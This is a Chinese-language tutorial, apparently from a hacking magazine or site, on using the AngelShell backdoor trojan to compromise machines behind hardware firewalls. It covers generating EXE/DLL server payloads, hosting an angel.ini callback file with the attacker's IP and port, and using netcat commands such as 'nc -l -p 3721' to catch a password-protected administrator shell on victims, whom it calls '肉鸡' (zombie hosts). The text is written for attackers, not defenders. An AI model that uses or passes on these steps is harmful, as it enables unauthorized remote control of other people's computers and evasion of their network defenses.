小天最近利用微软新爆出的几个漏洞,放出很多C/S木马,但捕获的“肉鸡”却是少之又少,让他郁闷不已。原来,很多中招者都是FTTP+LAN环境下的局域网用户,在小天与被攻击者之间隔有硬件防火墙,而采用IP直连的方法当然是行不通的。此时,他想到了一位法力无边的“天使”Angelshell……
木马档案
木马代号:Angelshell
木马版本:Ver1.0
木马特长:支持正/反双向连接,可生成EXE和DLL两种服务端,能够转发肉鸡的任意端口到本地机器。
对于广大攻击者而言,突破硬件防火墙无异于将一把利剑插入攻击对象的咽喉,这正是笔者今天要介绍的主角“AngelShell”的厉害之处。大家都知道,能够穿过硬件防火墙的后门程序非常少。然而,AngelShell不仅可以穿过硬件防火墙实现反向连接,还可让所有正向连接的程序都实现反向连接。
下面,笔者就带大家一同迈向“天使”所开启的后门(本文试验的肉鸡IP地址为61.*.*.101,笔者入侵用机的IP为61.*.*.157),看完本文大家会对AngelShell的使用方法有一个比较系统的了解。全文将分为“配置、连接、端口转发”三个部分来为读者讲解“天使”AngelShell的应用。
要想穿过硬件防火墙,这位天使需要极其强大的能量。因此,在让我们的天使发挥威力之前,先给它一点时间做好准备工作。让我们的天使积蓄能量吧。
在这一部分,笔者将向大家介绍AngelShell的基本设置。
首先我们来了解一下“天使”的组成部分。AngelShell的核心程序包含3个文件,它们分别是Angelshell.exe、Fport.exe、FportClient.exe。另外,最后连接肉鸡的工作还需要请出nc.exe来配合完成,也就是大家熟悉的“瑞士军刀”。
现在,笔者介绍一下它们的作用,以及它们是如何相互配合控制内网肉鸡的。
木马程序的生成要靠Angelshell.exe来完成,它被用于生成服务端的。在运行Angelshell.exe后,出现如图所示的窗口,在这里我们可设置连接端口(默认为3721)和连接密码,并在“反向连接信息”中填写好存放反向连接信息文件“angel.ini”的网络地址。填写妥当后,生成需要的服务端即可(DLL或EXE),其作用自然是让对方在运行后自动开启一个后门,以便进一步的入侵。
FportClient.exe则是被用来进行端口转发的客户端,它可以把远程计算机的任意端口反向模拟到本地机器来。
因为反向连接需要控制者的IP地址和端口信息,而不同用户的IP地址和想要设置的端口是不同的,所以angel.ini文件就需要手动编写并上传到自己的网络服务空间。格式如下:在第一行填写自己机器的IP地址(如“61.*.*.157),第二行写上nc.exe监听的端口,也就是肉鸡用来自动连接的端口(如3721)。其作用是,一旦肉鸡运行了木马程序,我们只要在自己的机器上用nc.exe监听3721端口,就可以让肉鸡上钩。
当肉鸡经不住天使的诱惑而上钩时,我们就可潜入肉鸡的硬盘之中。当然,要想能控制好我们的天使,还得依靠瑞士军刀的帮助。
我们要用到telnet连接和端口监听功能。如果肉鸡已经运行了刚才所生成的木马程序,我们可以使用以下方法来连接肉鸡。
nc正向连接的格式为“ncIP端口”,如“nc61.*.*.1013721”;反向连接的格式则为“nc-l-p监听端口”,如“nc-l-p3721”。不论你用何种方式连接成功后,都会显示Banner欢迎信息,此时输入先前设定的密码,成功的话就可以得到一个拥有管理员权限的命令提示符操作界面(CMDshell),登录成功后会显示AngelShell的帮助信息和附加功能说明。
当前位置:
